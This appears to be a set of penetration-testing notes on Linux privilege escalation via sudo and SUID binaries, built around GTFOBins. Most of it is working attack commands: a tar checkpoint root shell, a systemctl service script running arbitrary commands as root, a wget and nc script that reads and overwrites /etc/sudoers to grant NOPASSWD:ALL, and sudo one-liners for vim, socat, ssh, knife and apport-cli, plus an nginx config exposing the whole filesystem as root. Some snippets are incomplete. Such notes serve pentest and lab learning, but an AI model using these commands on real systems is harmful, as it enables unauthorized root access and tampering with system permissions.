GTFOBins (9.5k ⭐) a.k.a. "Get The Fuck Out" is a list of way to exploit binaries such as sed/tar/... to get root.

Common use cases are:

Note that not every exploit may pop a shell. Some only allow you to edit some files, which may help getting root.

Example πŸ”₯

You can only run tar using sudo. Run the command below from GTFOBins, and you will get a root shell.

$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

➑️ You can use GTFOBLookup (0.2k ⭐) for offline browsing.

➑️ You may need/want to create a root bash.

⚑ SUID systemctl script

Description: this script makes it easier to run several commands using systemctl.

Create a file with the contents below

echo "[Service]
ExecStart=/bin/sh -c '$@ > /tmp/output'
[Install]" > $TF
systemctl -f link $TF
systemctl -f enable --now $TF
cat /tmp/output


$ chmod +x
$ ./ id
$ ./ ls -laR /root

⚑ SUDO wget script

Description: this script automate privilege escalation using wget.

It's quite easy to do it manually, but you need two machines (ex: your VM and the target). This script is complex because everything is done locally, without interacting with your VM!

  • Will use wget to fetch /etc/sudoers and nc to grab the result

  • Then, it will replace the line giving access to wget and give you the permission to run every command as root

  • Then, we will start a python web server, and use wget with -o to replace our new sudo file with the tampered one.

  • Finally, the script run sudo bash and open your shell as root

⚠️ The script may mess with your sudoers file if something goes wrong. I destroyed my VM 7 times before managing to make the script work 🌳. If you understand the commands used in the script, use them one by one, and check the tampered sudoers file (output) BEFORE overriding the current one.

# todo: use mktemp

# Working in /tmp
cd /tmp
# -d and -q 0 to quit when connection is closed
nc -dlnp $port -q 0 > $output &
# -q = quiet, and -T 1 = close after one second
sudo wget -q --post-file=$file localhost:$port -T 1
# remove the HTTP headers
sed -i '1,9d' $output
# replace the command with find
sed -i "s/\($(whoami).*\)/$(whoami)  ALL=(ALL) NOPASSWD:ALL/g" $output
# create a web server
python3 -m http.server $port &
pid=$(echo $!)
sleep 1 # let the webserver start
# get the file then kill the webserver
# replace /etc/sudoers
sudo wget -q localhost:$port/$output -O $file && kill $pid
# open the root shell
sudo bash

Random Payloads

If we are allowed to run a command as sudo:

  • Common commands
$ sudo vim -c ':!/bin/sh'
$ sudo socat stdin exec:/bin/bash
$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x


$ sudo /usr/bin/apport-cli --file-bug
> 1
> 2
> F # any key
> V # view report (open less)
  • /usr/bin/systemctl status xxx.service

attacking_common_applications sau

While it may be secure, if a reader is opened, such as less, it may be leveraged to run commands e.g. using !/bin/bash for less.

  • /usr/bin/knife: knife can be exploited in many ways


$ sudo knife environment edit _default -e vim # -> sudo vim
$ sudo knife environment edit _default -e
$ sudo knife exec --exec "exec '/bin/sh -i'"
$ echo -n 'exec "/bin/bash -i"' > config.rb
$ sudo knife user list -c config.rb
  • nginx can be used to read files. It may also be used to write files using dav_methods PUT;. For instance, adding an entry in authorized keys or sudoers.


$ cat $(pwd)/test.conf
user root;
events {
    worker_connections 768;
http {
    server {
       listen 80;
        server_name  pwned.test;

        location / {
            root /;
            autoindex on; 
$ sudo nginx -s stop
$ sudo nginx -c $(pwd)/test.conf